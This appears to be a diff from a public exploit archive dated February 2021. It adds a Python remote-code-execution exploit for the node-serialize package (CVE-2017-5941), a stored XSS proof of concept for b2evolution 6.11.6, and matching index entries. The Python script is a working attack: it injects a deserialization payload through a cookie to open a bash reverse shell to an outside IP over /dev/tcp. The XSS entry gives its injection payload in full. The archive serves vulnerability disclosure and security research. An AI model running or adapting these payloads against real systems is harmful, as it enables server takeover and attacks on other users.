DB: 2021-02-11

3 changes to exploits/shellcodes

b2evolution 6.11.6 - 'plugin name' Stored XSS
Node.JS - 'node-serialize' Remote Code Execution (2)

exploits/nodejs/webapps/49552.py

@@ -0,0 +1,36 @@
+# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
+# Exploit Author: UndeadLarva
+# Software Link: https://www.npmjs.com/package/node-serialize
+# Version: 0.0.4
+# CVE: CVE-2017-5941
+
+import requests
+import re
+import base64
+import sys
+
+url = 'http://192.168.100.133:8000/' # change this
+
+payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
+"return function () {"
+"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
+"console.log('still inside');"
+"const { exec } = require('child_process');"
+"exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1');" # change this
+"}"
+"})(require('http').ServerResponse.prototype.end)")
+
+# rce = "_$$ND_FUNC$$_process.exit(0)"
+# code ="_$$ND_FUNC$$_console.log('behind you')"
+code = "_$$ND_FUNC$$_" + payload
+
+string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
+
+cookie = {'profile':base64.b64encode(string)}
+
+try:
+    response = requests.get(url, cookies=cookie).text
+    print response
+except requests.exceptions.RequestException as e:
+    print('Oops!')
+    sys.exit(1)

exploits/php/webapps/49551.txt

@@ -0,0 +1,18 @@
+# Exploit Title: b2evolution 6.11.6 - 'plugin name' Stored XSS
+# Date: 09/02/2021
+# Exploit Author: Soham Bakore, Nakul Ratti
+# Vendor Homepage: https://b2evolution.net/
+# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
+# Version: 6.11.6
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+# CVE : CVE-2020-22841
+
+
+--------------------------Proof of Concept-----------------------
+
+1. Login with an account having high privileges  
+2. Navigate to System -> Plugins and select any plugin
+3. Change the plugin name and enter the following payload  "><svg/onload=alert(123)> in the name parameter
+4. Payload gets stored in the database
+5. The payload gets executed after the victim checks the plugin page.
+6. This vulnerability needs high privilege and can affect other users with similar privileges

exploits/windows/local/49530.txt

@@ -6,6 +6,7 @@
 # Software Link: https://download.millewin.it/files/Millewin/setup/InstMille_Demo_13.39_2019PS.exe
 # Version: 13.39.028 – 146.1.9
 # Tested on: Microsoft Windows 10 Enterprise x64
+# CVE: CVE-2021-3394
 
 Millennium Millewin also known as "Cartella clinica"
 

files_exploits.csv

@@ -43740,3 +43740,5 @@ id,file,description,date,author,type,platform,port
 49545,exploits/php/webapps/49545.txt,"WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion",2021-02-08,"Erik David Martin",webapps,php,
 49546,exploits/php/webapps/49546.txt,"Online Car Rental System 1.0 - Stored Cross Site Scripting",2021-02-09,"Naved Shaikh",webapps,php,
 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
+49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
+49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,